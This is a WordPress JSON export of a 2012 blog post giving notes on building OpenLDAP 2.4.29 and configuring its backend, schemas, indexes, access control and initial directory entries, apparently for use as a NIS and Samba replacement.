{"id":28,"date":"2012-02-13T17:20:39","date_gmt":"2012-02-13T09:20:39","guid":{"rendered":"http:\/\/www.q-station.net\/kb\/?p=28"},"modified":"2012-02-15T14:40:25","modified_gmt":"2012-02-15T06:40:25","slug":"openldap-building-and-configuration","status":"publish","type":"post","link":"https:\/\/kb.q-station.net\/index.php\/2012\/02\/13\/openldap-building-and-configuration\/","title":{"rendered":"openldap building and configuration"},"content":{"rendered":"<p>Notes on configuring OpenLDAP (2.4.29) as the NSS and PAM backend for Linux, as a NIS replacement, and as a Samba PDC.<br \/>\n<!--more--><\/p>\n<h1>Building &amp; Installation<\/h1>\n<pre>.\/configure --prefix=\/usr\/local\/openldap --enable-modules --enable-overlays=mod --enable-crypt\r\nmake depend\r\nmake\r\nmake install<\/pre>\n<h1>Configuration<\/h1>\n<h2>slapd.d &amp; slapd.conf<\/h2>\n<p>The configuration of OpenLDAP is now stored entirely in LDAP itself, under cn=config. The quickest way to adopt the new configuration format is to convert slapd.conf into LDIF config entries under the slapd.d directory.<\/p>\n<pre>&gt; slaptest -f slapd.conf -F slapd.d<\/pre>\n<p>To access the cn=config tree through ldapsearch or another LDAP browser client, you need to assign olcRootDN &amp; olcRootPW to the cn=config backend.<\/p>\n<ul>\n<li>open your slapd.d\/cn=config\/olcDatabase={0}config.ldif<\/li>\n<li>insert olcRootDN: cn=Manager,cn=config<\/li>\n<li>insert olcRootPW and its password value<\/li>\n<\/ul>\n<p>(ref: <a title=\"doing OpenLDAP config changes in RHEL 6\" href=\"http:\/\/unix.stackexchange.com\/questions\/16092\/doing-openldap-config-changes-in-rhel-6\/16102#16102\" target=\"_blank\">doing OpenLDAP config changes in RHEL 6<\/a>)<\/p>\n<h2>db backend<\/h2>\n<pre>database        bdb\r\nsuffix          \"dc=xyz,dc=xxx\"\r\nrootdn          \"cn=Manager,dc=xyz,dc=xxx\"\r\nrootpw          
{SSHA}xxyyzzddeeffgghhiijjkkll<\/pre>\n<h2>Schema<\/h2>\n<pre>include         \/usr\/local\/openldap\/etc\/openldap\/schema\/core.schema\r\ninclude         \/usr\/local\/openldap\/etc\/openldap\/schema\/cosine.schema\r\ninclude         \/usr\/local\/openldap\/etc\/openldap\/schema\/nis.schema<\/pre>\n<p>To add the schemas to cn=config instead, run:<\/p>\n<pre>&gt; ldapadd -h localhost -x -D 'cn=Manager,cn=config' -W -f cosine.ldif\r\n&gt; ldapadd -h localhost -x -D 'cn=Manager,cn=config' -W -f nis.ldif<\/pre>\n<p>where cosine.ldif &amp; nis.ldif are included with OpenLDAP.<\/p>\n<h2>Index<\/h2>\n<pre>index   objectClass     eq,pres\r\nindex   cn,uid,mail        pres,eq,sub<\/pre>\n<h2>ACL<\/h2>\n<pre>dn: olcDatabase={1}bdb,cn=config\r\nolcAccess: {0}to * by self write by * read<\/pre>\n<p>Note that this rule gives every client, including anonymous ones, read access to all attributes, userPassword included; a more specific rule for userPassword should come before it.<\/p>\n<h2>Setup using slapd.d<\/h2>\n<p>Convert slapd.conf to slapd.d:<\/p>\n<pre>&gt; slaptest -f slapd.conf -F slapd.d<\/pre>\n<h2>The 1st base entry<\/h2>\n<pre>&gt; ldapmodify -h localhost -D 'cn=Manager,dc=xyz,dc=xxx' -w password -x\r\ndn: dc=xyz, dc=xxx\r\nchangetype: add\r\nobjectclass: top\r\nobjectclass: dcObject\r\nobjectclass: organization\r\ndc: xyz\r\no: xyz company<\/pre>\n<h2>The whole DIT<\/h2>\n<pre>dn: dc=xyz,dc=xxx\r\nchangetype: add\r\nobjectclass: top\r\nobjectclass: dcObject\r\nobjectclass: organization\r\ndc: xyz\r\no: xyz.xxx Inc\r\n\r\ndn: ou=group,dc=xyz,dc=xxx\r\nchangetype: add\r\nobjectclass: organizationalunit\r\nou: group\r\ndescription: generic groups branch\r\n\r\ndn: ou=people,dc=xyz,dc=xxx\r\nchangetype: add\r\nobjectclass: organizationalunit\r\nou: people\r\ndescription: generic people branch<\/pre>\n<p>Further reading: <a title=\"Configuring OpenLDAP as a replacement for NIS\" href=\"http:\/\/www.q-station.net\/kb\/index.php\/2012\/02\/15\/configuring-openldap-as-a-replacement-for-nis\/\">Configuring OpenLDAP as a replacement for NIS<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Notes on configuring OpenLDAP (2.4.29) as the NSS and PAM backend for Linux, as a NIS replacement, and as a Samba PDC.<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_mi_skip_tracking":false},"categories":[3,8],"tags":[11,9,12,10],"_links":{"self":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts\/28"}],"collection":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/comments?post=28"}],"version-history":[{"count":27,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts\/28\/revisions"}],"predecessor-version":[{"id":51,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts\/28\/revisions\/51"}],"wp:attachment":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/media?parent=28"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/categories?post=28"},{"taxonomy":"post_tag","embeddabl
e":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/tags?post=28"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}